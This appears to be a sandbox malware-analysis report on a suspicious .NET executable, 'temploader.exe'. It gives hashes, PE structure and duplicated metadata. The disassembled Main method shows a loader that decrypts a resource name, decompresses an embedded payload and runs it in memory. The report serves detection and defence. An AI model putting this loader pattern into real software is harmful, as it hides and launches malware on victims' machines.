Suspicious
Suspect

56770ffe1007c3b0b8317324a1f1f6ec

PE Executable
|
MD5: 56770ffe1007c3b0b8317324a1f1f6ec
|
Size: 1.85 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
56770ffe1007c3b0b8317324a1f1f6ec
Sha1
432fab237acf1e1c2de86bbdefd774288c20f343
Sha256
234c27282540fce4e90e597643213f70e86a028f155ac6796abcd5d88b3e53d0
Sha384
b58f6e10d261e8a3466fbd47ad79639022c7a36796c103022ece612c6aa3999e3ca522db9999ee3ada42580ddd76e19a
Sha512
50fb4446328c316b35ec9e33bdd871dee64024880a379a522a0fd17ec39a873b8b41c6a69adac06425d74c43e18919aaa3e989289c7dd387bf85559529610564
SSDeep
49152:I2xpE+lufuINhI1aUldbJ8R1Xf+8aduStOnl:I2xrQpNa/lP8R1Za30
TLSH
7B8533BBE9B592C7DF40DB7FE4B71E1B2E4463438214D228B82E66CDD5024629F9D138

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
56770ffe1007c3b0b8317324a1f1f6ec
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Module Name

temploader.exe
Full Name

temploader.exe
EntryPoint

System.Void a.a::Main()
Scope Name

temploader.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

temploader
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

3
Main Method

System.Void a.a::Main()
Main IL Instruction Count

37
Main IL

call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldstr DwHCpvZOSDRbGcRvwQ/qpg== ldstr GbOC8/0FNDMvpceVK/yWnV49A2l2pGzr1rWKOLmSKPI= ldstr 9EHs+DE55KblKKhZxtd88Q== call System.String ⨲ꓣ緊굛উᒌ닏ɗ며::펿䏂ቌ摤왯ퟩ㕦ಓﵡ(System.String,System.String,System.String) callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.0 <null> newobj System.Void System.IO.MemoryStream::.ctor() stloc.1 <null> ldloc.0 <null> ldc.i4.0 <null> newobj System.Void System.IO.Compression.DeflateStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc.2 <null> ldloc.2 <null> ldloc.1 <null> callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) leave IL_0046: ldloc.1 ldloc.2 <null> brfalse IL_0045: endfinally ldloc.2 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Byte[] System.IO.MemoryStream::ToArray() call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_0070: ret ldloc.0 <null> brfalse IL_006F: endfinally ldloc.0 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
Module Name

temploader.exe
Full Name

temploader.exe
EntryPoint

System.Void a.a::Main()
Scope Name

temploader.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

temploader
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

3
Main Method

System.Void a.a::Main()
Main IL Instruction Count

37
Main IL

call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldstr DwHCpvZOSDRbGcRvwQ/qpg== ldstr GbOC8/0FNDMvpceVK/yWnV49A2l2pGzr1rWKOLmSKPI= ldstr 9EHs+DE55KblKKhZxtd88Q== call System.String ⨲ꓣ緊굛উᒌ닏ɗ며::펿䏂ቌ摤왯ퟩ㕦ಓﵡ(System.String,System.String,System.String) callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.0 <null> newobj System.Void System.IO.MemoryStream::.ctor() stloc.1 <null> ldloc.0 <null> ldc.i4.0 <null> newobj System.Void System.IO.Compression.DeflateStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc.2 <null> ldloc.2 <null> ldloc.1 <null> callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) leave IL_0046: ldloc.1 ldloc.2 <null> brfalse IL_0045: endfinally ldloc.2 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Byte[] System.IO.MemoryStream::ToArray() call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_0070: ret ldloc.0 <null> brfalse IL_006F: endfinally ldloc.0 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
Artefacts
Name
 Value
Embedded Resources

1
Suspicious Type Names (1-2 chars)

1
56770ffe1007c3b0b8317324a1f1f6ec (1.85 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙